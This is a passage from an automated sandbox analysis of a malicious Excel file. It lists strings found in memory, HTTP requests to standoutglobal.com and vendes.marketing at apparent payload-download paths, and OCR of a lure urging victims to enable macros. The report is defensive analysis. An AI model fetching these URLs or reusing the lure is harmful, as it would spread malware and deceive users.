    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000001.00000003.420487030.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577929196.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382801866.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433675805.000000000F668000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comC
    Source: EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comSharepointFilesHostFormat
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comonG
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comships
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420487030.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577929196.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382801866.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433675805.000000000F668000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.c
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?v
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/js/happy-addons.min.js?ver
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/AE.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/figma.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/framer.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.png
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-google-adwords.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.png
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/microsoft.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/10/webflow.svg
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1568x533.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-2048x696.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-768x261.png
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/global.css?ver=1637592552
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=1638212153
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/elementor/css/post-5.css?ver=1637592550
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/caso-exito1.png
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario1.jpg
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpg
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-content/uploads/images/comentario6.jpg
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.4
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.2
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-includes/wlwmanifest.xml
    Source: EXCEL.EXE, 00000001.00000003.456181279.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421917396.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491626007.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384326864.000000001307E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384312092.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461632649.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435017611.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433424228.0000000015AD1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421150549.0000000015AD7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491604378.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456171717.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439337436.0000000013079000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580947514.0000000013079000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F&#038;format=
    Source: EXCEL.EXE, 00000001.00000003.456181279.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491626007.000000001307F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.384326864.000000001307E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433424228.0000000015AD1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421150549.0000000015AD7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/wp-json/wp/v2/pages/1522
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://vendes.marketing/xmlrpc.php?rsd
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesUserVoiceWordIOShttps://word.uservoice.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/z3
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comE
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.382474617.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439243495.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434833888.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421041076.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494384383.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282412041.000000001301E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461524519.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580829333.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456076552.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.422155036.0000000013019000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.mst.FP
    Source: besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/futuro-del-marketing/transformacion-digital/tiendas-omni
    Source: BX1IWYL9.htm.1.drString found in binary or memory: https://www.thinkwithgoogle.com/intl/es-419/insights/tendencias-de-consumo/6-certezas-sobre-el-nuevo
    Source: unknown; DNS traffic detected: queries for: standoutglobal.com
    Source: global traffic; HTTP traffic detected:
        GET /2/MWpqeVgZ/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Connection: Keep-Alive
        Host: standoutglobal.com
    Source: global traffic; HTTP traffic detected:
        GET / HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Connection: Keep-Alive
        Host: vendes.marketing
    Source: global traffic; HTTP traffic detected:
        GET /2/MWpqeVgZ/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: standoutglobal.com
        Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
        GET /transmigrant/Wplzr/ HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: vendes.marketing
        Connection: Keep-Alive
    Source: unknown; HTTPS traffic detected: 162.240.9.126:443 -> 192.168.2.3:49745 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.3:49747 version: TLS 1.2

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4; Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Content
    Source: Screenshot number: 4; Screenshot OCR: protected documents. 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editin
    Source: Screenshot number: 4; Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 1'7 T U V W r 18 19 20 1 G
